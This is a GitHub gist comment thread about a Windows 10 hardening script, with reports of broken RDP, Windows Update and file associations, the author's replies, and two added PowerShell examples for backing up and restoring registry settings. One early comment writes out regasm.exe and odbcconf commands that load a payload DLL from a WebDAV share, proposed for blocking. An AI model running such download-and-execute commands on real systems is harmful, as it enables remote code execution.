
A Windows hardening script

source link: https://gist.github.com/ricardojba/ecdfe30dadbdab6c514a530bc5d51ef6

I would add regasm.exe:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \webdavserver\folder\payload.dll

Please also add odbcconf to the firewall config:
odbcconf /s /a {regsvr \webdavserver\folder\payload_dll.txt}

And all the others suggested in the following link:
source https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md

Sorry for the noob question, but how do I run this script on a Windows server?
If you could provide the steps.

ricardojba (Author) commented on Aug 25, 2020

Put the content of this Gist on a windows_harden.cmd and run it.

After I've executed the script, it is impossible to access the VM through RDP. Is that normal? What should I modify to allow RDP connections, please?

How can I roll back to the original state?

The script makes it impossible to right click on the Start button and choose any of the Computer Management options. I have made a change in my own GitHub: the .msc extension should NOT be associated with Notepad! Plus, the associations here are all wrong. Instead of just opening a .js file with Notepad, it's trying to open filename.js.txt, and always errors out, for any of these file types.


Nice fix, should be merged

Also, one of those damn settings is breaking Windows Update:
:: Prioritize ECC Curves with longer keys - IISCrypto (recommended options)
reg add "HKLM\SOFTWARE\Policies\Microsoft\Cryptography\Configuration\SSL\00010002" /v EccCurves /t REG_MULTI_SZ /d NistP384,NistP256 /f

And I found another couple of settings that block RDP outgoing/incoming. Guys, this script has never been tested in production. Just use my revision, which has all of this fixed and contains many improvements.
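The comment above identifies the EccCurves policy value as the setting that interferes with Windows Update. The following PowerShell is an added example, not code from the gist or from any of the commenters: it reads the value the gist writes, exports the key so the change can be reversed with `reg import`, and removes the policy value so Schannel falls back to the OS default curve list. The backup directory under ProgramData is an assumed location; run it from an elevated session.

```powershell
# Added example (not from the gist): inspect, back up and remove the EccCurves
# policy value set by the "Prioritize ECC Curves" line. Run elevated.
$PolicyKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Cryptography\Configuration\SSL\00010002'
$RegExePath = 'HKLM\SOFTWARE\Policies\Microsoft\Cryptography\Configuration\SSL\00010002'
$ValueName  = 'EccCurves'
$BackupDir  = Join-Path $env:ProgramData 'hardening-rollback'   # assumed location

function Get-EccCurvesPolicy {
    # Returns the configured curve list (REG_MULTI_SZ as a string array),
    # or $null when no policy is set. No policy means Schannel uses the OS default order.
    $item = Get-ItemProperty -Path $PolicyKey -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$ValueName
}

function Backup-EccCurvesPolicy {
    # reg.exe export writes the whole key, so 'reg import <file>' restores it exactly.
    New-Item -ItemType Directory -Path $BackupDir -Force | Out-Null
    $stamp = Get-Date -Format 'yyyyMMdd-HHmmss'
    $file  = Join-Path $BackupDir "EccCurves-$stamp.reg"
    reg.exe export $RegExePath $file /y | Out-Null
    return $file
}

function Remove-EccCurvesPolicy {
    # Deleting the value (rather than writing a different list) returns the
    # machine to the built-in default; a reboot makes Schannel re-read it.
    Remove-ItemProperty -Path $PolicyKey -Name $ValueName -ErrorAction Stop
}

$current = Get-EccCurvesPolicy
if ($null -eq $current) {
    Write-Host 'No EccCurves policy set; Schannel is using the OS default curve list.'
} else {
    Write-Host "EccCurves policy present: $($current -join ', ')"
    $backup = Backup-EccCurvesPolicy
    Write-Host "Exported key to $backup (restore with: reg import `"$backup`")"
    Remove-EccCurvesPolicy
    Write-Host 'Policy value removed; reboot for the change to take effect.'
}

# For comparison, the curve list the OS actually offers (TLS module, Windows 10 1607+ / Server 2016+).
Get-TlsEccCurve
```

Restricting the curve list to NistP384 and NistP256 removes everything else the OS would otherwise negotiate, so any TLS peer that only offers curves outside that list fails the handshake; backing the key up before touching it keeps the change reversible on a machine where you cannot afford to guess which peer broke.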

ricardojba (Author) commented on Oct 28, 2020 (edited)

Hi @atlantsecurity

I'm sorry, but did you actually think that this script is some kind of software that you bought and want a refund for because it is not working like you want? This script by no means intends or pretends to be anything near what you might be assuming or thinking.

I'm actually running this on my Windows box and other family members' for years now, and most of the hardening tweaks from this script are being used in companies in production.

This script was made from another script, which I've given full credit to right at its start, and then extended further based on my own NEEDS, not yours or anyone else's on the Internet. I decided to store it here for my own benefit and for anyone else that might find it useful.

If you don't know what you are doing and don't understand what the script does, then it's entirely your own problem and not mine to solve in any way.

So be so kind and go ADD ON YOUR OWN GIST crappy and unproductive comments such as

"Guys, this script has never been tested in production. Just use my revision which has all of this fixed and contains many improvements."

as if you were somehow the author maintaining this script.

Thank you

After running this script I am unable to log in with the old password.

Ok... This script will UTTERLY f*ck your windows server up... You can't open gpedit.msc, you can't RDP into it, you can basically throw that windows server installation down the trash.

Ricardo, I don't care if you sell your script or not. If you post it saying it will harden your workstation when in fact you should state that it will SCREW UP your server, you're just incompetent. That windows 2016 server is throwing up SO MANY ERRORS that it's not even funny.

That's not hardening by any means, that's stripping it down until it can't function. What a waste of perfectly good time...


Unfortunately I had the same experience.
Can someone share other hardening examples you recommend?

cheers

obsti8383 commented on Dec 21, 2020 (edited)


@Nephaleem
You clearly can't harden a Windows server with a script that's meant for a Windows client. Hardening a server with a one-size-fits-all script is impossible anyhow. The incompetence here clearly lies not on Ricardo's side...

Hi, I have used this script for hardening my Windows 10 client. Apart from some little errors during the execution of the script, everything was good. My workstation has not been damaged. Sincerely

On Mon, 21 Dec 2020 at 21:50, Florian <[email protected]> wrote:

@ricardojba well done on the script, and on the implementations and additions that were made.

Testing this out on a Windows 10 20H2 machine. This makes my life easier. Next step: test with other Windows 10 clients and live users. Thumbs up.

After running this script I am unable to Remote Desktop into Windows Server 2016. Any solution?


Have you read line 13?

:This script is intended for and tested on Windows 10, so do not run it in a production Windows Server!!!

Thanks for your reply, I got it.

Do you have any completed hardening script for Windows Server 2016?

Thank you for the script! I've changed a few things to tweak it to how I like, but I appreciate the upload! To those installing on a prod server or prod workstation without testing and knowing what it does: wtf were you thinking? Anyone actually smart in IT would test first, then roll to production...

Thank you for the script! Can it be used on Windows Server also?

@azmiameerdeen "yes"

But this is more like a list of things you can do. Make sure you understand what it does. E.g. if your organization uses OneNote, uninstalling the Modern UI version is maybe counterproductive. There are more examples in there for sure.

ManUnit commented on Jun 2 (edited)

I don't recommend this script for Windows. If someone has run this script, try restoring my default associations, which I copied from the Windows 10 registry.

Go download the file from my repository: https://github.com/ManUnit/windows-default-assosiation.git
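Two comments in this thread (the one about .msc and .js ending up associated with Notepad, and ManUnit's offer of exported default associations) come down to the same operational problem: a hardening script rewrote the HKCR association chain and nobody had a snapshot to roll back to. The PowerShell below is an added example, not code from the gist or from ManUnit's repository. It records, for a list of script-type extensions, the `.ext -> ProgId -> shell\open\command` chain before a script is run, prints it for review, and can write the recorded mappings back. The snapshot path under ProgramData and the extension list are assumptions; run it elevated.

```powershell
# Added example (not from the gist): snapshot and restore HKCR file-association
# chains for extensions a hardening script typically reassigns. Run elevated.
$Extensions   = '.js', '.jse', '.vbs', '.vbe', '.wsf', '.wsh', '.hta',
                '.ps1', '.msc', '.reg', '.bat', '.cmd', '.scr'         # assumed list
$SnapshotFile = Join-Path $env:ProgramData 'hardening-rollback\assoc-snapshot.json'  # assumed path

function Get-AssocChain {
    param([string]$Ext)
    # The extension key's default value names a ProgId; the ProgId's
    # shell\open\command default value is what actually gets launched.
    $progId  = (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\$Ext" `
                -ErrorAction SilentlyContinue).'(default)'
    $command = $null
    if ($progId) {
        $command = (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\$progId\shell\open\command" `
                    -ErrorAction SilentlyContinue).'(default)'
    }
    [pscustomobject]@{ Extension = $Ext; ProgId = $progId; OpenCommand = $command }
}

function Save-AssocSnapshot {
    # Writes the current chain for every listed extension to JSON for later restore.
    New-Item -ItemType Directory -Path (Split-Path $SnapshotFile) -Force | Out-Null
    $Extensions | ForEach-Object { Get-AssocChain $_ } |
        ConvertTo-Json | Set-Content -Path $SnapshotFile
    return $SnapshotFile
}

function Restore-AssocSnapshot {
    # Writes back only what was recorded. Writes through HKEY_CLASSES_ROOT land in
    # HKLM\SOFTWARE\Classes unless the key already exists under HKCU\SOFTWARE\Classes.
    $saved = Get-Content -Path $SnapshotFile -Raw | ConvertFrom-Json
    foreach ($entry in $saved) {
        if (-not $entry.ProgId) { continue }     # extension had no association; leave it alone
        Set-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\$($entry.Extension)" `
                         -Name '(default)' -Value $entry.ProgId
        if ($entry.OpenCommand) {
            $cmdKey = "Registry::HKEY_CLASSES_ROOT\$($entry.ProgId)\shell\open\command"
            if (-not (Test-Path $cmdKey)) { New-Item -Path $cmdKey -Force | Out-Null }
            Set-ItemProperty -Path $cmdKey -Name '(default)' -Value $entry.OpenCommand
        }
    }
}

# Review pass: anything pointing at notepad.exe, or a ProgId that adds a ".txt"
# indirection, is the symptom the thread describes.
$Extensions | ForEach-Object { Get-AssocChain $_ } | Format-Table -AutoSize

# Typical use: Save-AssocSnapshot before running the hardening script,
# Restore-AssocSnapshot afterwards if the associations turn out to be wrong.
```

Per-user overrides (the UserChoice entries under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts) take precedence over the HKCR chain, so an association that still looks wrong after a restore is usually one of those rather than the machine-wide mapping. Reassociating script extensions to a viewer is a legitimate mitigation against double-click execution; the point of the snapshot is only that the change be deliberate and reversible.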

KitCat36 commented on Sep 13 (edited)

How does uninstalling OneDrive harden Windows exactly? It's one of the core built-in functionalities that's very useful and can help in the recovery process in case of ransomware, using its file history feature.
